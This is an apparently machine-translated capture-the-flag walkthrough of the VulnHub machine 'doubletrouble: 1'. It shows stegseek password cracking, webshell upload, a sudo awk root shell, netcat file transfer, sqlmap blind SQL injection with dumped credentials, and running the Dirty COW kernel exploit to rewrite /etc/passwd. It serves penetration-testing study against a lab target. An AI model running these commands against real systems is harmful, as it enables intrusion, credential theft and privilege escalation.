- 英文名称:doubletrouble: 1
- Chinese name: Double troubles: 1
- Published date: September 11, 2021
- Difficulty: Easy
- Description: About VM: Test and export from VirtualBox. Enable DHCP and nested VTX/AMDV. You can contact me via email for troubleshooting or questions.
- Download: https://www.vulnhub.com/entry/empire-breakout,751/
AILX10
Excellent answerer in cybersecurity
Master's in Cybersecurity
Go to consult
1. Host discovery (192.168.199.107)
Host discovery
2. Port scanning, port 22 and port 80 are found
Port scanning
3. Visit the web page
4. Search for vulnerabilities in web components
Web component vulnerabilities
5. Discover the web directory
┌──(ailx10㉿kali)-[~]
└─$ dirb http://192.168.199.107/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Aug 21 17:50:02 2022
URL_BASE: http://192.168.199.107/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
+ http://192.168.199.107/favicon.ico (CODE:200|SIZE:894)
+ http://192.168.199.107/index.php (CODE:200|SIZE:5816)
+ http://192.168.199.107/robots.txt (CODE:200|SIZE:26)
+ http://192.168.199.107/server-status (CODE:403|SIZE:280)
+ http://192.168.199.107/install/index.php (CODE:200|SIZE:1815)
==> DIRECTORY: http://192.168.199.107/uploads/
==> DIRECTORY: http://192.168.199.107/backups/
==> DIRECTORY: http://192.168.199.107/secret/
...
-----------------
END_TIME: Sun Aug 21 17:50:11 2022
DOWNLOADED: 9224 - FOUND: 5
6. Discover a secret document
clue
7. Try to extract the embedded information from the image
steghide info doubletrouble.jpg
Try extracting the information from the picture
8. Use Stegseek to crack Steghide steganography data[1]
Stegseek is by far the fastest Steghide cracker in the world, and the tool is capable of processing millions of passwords per second.
It is worth mentioning that in just two seconds, the tool can run through rockyou.txt dictionary.
And as we all know, rockyou.txt is a powerful dictionary file that contains more than 14 million passwords.
─# wget https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# apt install ./stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt
I'm afraid I'm not afraid of it.
秒出密码:92camaro
9. Extract the embedded information in the picture again to get the email address and password
┌──(root㉿kali)-[/home/ailx10/002]
└─# steghide info doubletrouble.jpg
┌──(root㉿kali)-[/home/ailx10/002]
└─# cat doubletrouble.jpg.out
[email protected]
otis666
Get the web administrator password
10. Enter the web background and add user ailx10
Added user ailx10
11. Switch accounts, create projects, and upload webshells
Upload the webshell
12. Bounce shell
Bounce shell
13. Check sudo and find that the awk privilege command does not require a password
Upgrade root
14. Upgraded to root permission, I found another target machine, and it was really a sixth target
sudo awk 'BEGIN {system("/bin/sh")}'
Meet the Sixth
15. NC download to the local computer
服务端:
nc -lvp 4444 > ailx10_double_trouble.ova
客户端:
nc 192.168.199.247 4444 < doubletrouble.ova
Download the second OVA
16. Turn on the second target machine and repeat the infiltration process
The second target machine
17. The host found that there was one more IP: 192.168.199.171
Add an IP address: 192.168.199.171
18. Port scanning, ports 22 and 80 are found
Port scanning
19. Visit the web page
web pages
20. Try sqlmap injection
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=ailx10' AND (SELECT 8679 FROM (SELECT(SLEEP(5)))oZRk) AND 'IwOe'='IwOe&psw=123456&btnLogin=Login
---
Storage SQL injection vulnerability
21. Try to get the database name (doubletrouble)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" --current-db
The name of the database
22. Try to get the table name (users)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble --tables
Table Name
23、尝试获得字段名称(username,password)
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users --columns
The name of the field
24. Try to get the contents of the fields in the table
sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users -C username,password --dump
Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1 |
| clapton | ZubZub99 |
+----------+----------+
Field contents
25. Try to log in to SSH to get the flag of the common user
SSH login to get a normal flag
26. Obtain system information and try to find vulnerabilities
System Information
Elevated POC
27. Compile 45010 and find that the file is missing, so I have to go to the dirty cow[2]
Dirty Cow vulnerability (CVE-2016–5195), which affects earlier versions of Linux
Centos7/RHEL7 3.10.0-327.36.3.el7
Cetnos6/RHEL6 2.6.32-642.6.2.el6
Ubuntu 16.10 4.8.0-26.28
Ubuntu 16.04 4.4.0-45.66
Ubuntu 14.04 3.13.0-100.147
Debian 8 3.16.36-1+deb8u2
Debian 7 3.2.82-1
Specifically, the vulnerability is due to the fact that get_user_page kernel function may generate a race condition during the process of processing Copy-on-Write, causing the COW process to be corrupted, resulting in the opportunity to write data to the read-only memory area in the process address space.
Modify the su or passwd program to achieve the purpose of root.
clapton@doubletrouble:~$ ls
45010.c dirty.c user.txt
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$ ls
45010.c dirty dirty.c user.txt
clapton@doubletrouble:~$ ./dirty ailx10
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: ailx10
Complete line:
firefart:fimjbZU2MTUTY:0:0:pwned:/root:/bin/bash
mmap: 7f49735fb000
28. Upgrade rights and get the flag of root
Get the flag of root
At this point, the experiment is complete~
reference
- ^stegseek https://github.com/RickdeJager/stegseek/releases
- ^Dirty Cow https://github.com/firefart/dirtycow
Edited on 2022-08-21 21:08